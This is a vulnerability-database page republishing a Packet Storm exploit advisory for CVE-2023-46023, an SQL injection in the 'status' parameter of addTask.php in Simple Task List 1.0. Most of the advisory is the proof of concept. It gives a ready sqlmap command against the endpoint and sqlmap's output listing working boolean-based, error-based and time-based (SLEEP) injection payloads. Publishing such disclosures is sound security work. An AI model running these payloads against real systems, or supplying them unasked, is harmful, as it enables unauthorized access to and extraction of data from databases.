Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormErsin ErenlerPACKETSTORM:177672
HistoryMar 20, 2024 - 12:00 a.m.

Simple Task List 1.0 SQL Injection

2024-03-2000:00:00
Ersin Erenler
packetstormsecurity.com
137
simple task list
sql injection
cve-2023-46023
unauthorized access
database extraction
sqlmap
vulnerable file
proof of concept
exploit
ersin erenler
php
apache
windows
linux .

7.4 High

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

18.3%

JSON
`# Exploit Title: Simple Task List 1.0 - 'status' SQLi  
# Date: 2023-11-15  
# Exploit Author: Ersin Erenler  
# Vendor Homepage: https://code-projects.org/simple-task-list-in-php-with-source-code  
# Software Link: https://download-media.code-projects.org/2020/12/Simple_Task_List_In_PHP_With_Source_Code.zip  
# Version: 1.0  
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0  
# CVE : CVE-2023-46023  
  
-------------------------------------------------------------------------------  
  
# Description:  
  
Simple Task List V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'status' parameter in the addTask.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.  
  
Vulnerable File: /addTask.php  
  
Parameter Name: status  
  
# Proof of Concept:  
----------------------  
  
1. Register and login the system  
2. Add a project and a task  
3. Then use the sqlmap to exploit  
4. sqlmap -u "http://localhost/Tasklist/addTask.php" --headers "Cookie: PHPSESSID=<php-cookie-value>" --method POST --data "name=test&status=N" -p status --risk 3 --level 5 --dbms mysql --batch --current-db  
  
# SQLMap Response:  
----------------------  
---  
Parameter: status (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: name=test&status=N'||(SELECT 0x59506356 WHERE 1189=1189 AND 7323=7323)||'  
  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: name=test&status=N'||(SELECT 0x6b786b49 WHERE 7851=7851 AND (SELECT 9569 FROM(SELECT COUNT(*),CONCAT(0x7171787171,(SELECT (ELT(9569=9569,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: name=test&status=N'||(SELECT 0x5669775a WHERE 4483=4483 AND (SELECT 3096 FROM (SELECT(SLEEP(5)))iFlC))||'  
---  
  
`

Related

prion 1
nvd 1
cvelist 1
exploitdb 1
cve 1
zdt 1
prion
prion
Sql injection
2023-11-14 22:15:00
nvd
nvd
CVE-2023-46023
2023-11-14 22:15:30
cvelist
cvelist
CVE-2023-46023
2023-11-14 00:00:00
exploitdb
exploitdb
Simple Task List 1.0 - &#039;status&#039; SQLi
2024-03-20 00:00:00
cve
cve
CVE-2023-46023
2023-11-14 22:15:30
zdt
zdt
Simple Task List 1.0 - (status) SQL injection Vulnerability
2024-03-20 00:00:00

7.4 High

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

18.3%

JSON
Related for PACKETSTORM:177672
prion1nvd1cvelist1exploitdb1cve1zdt1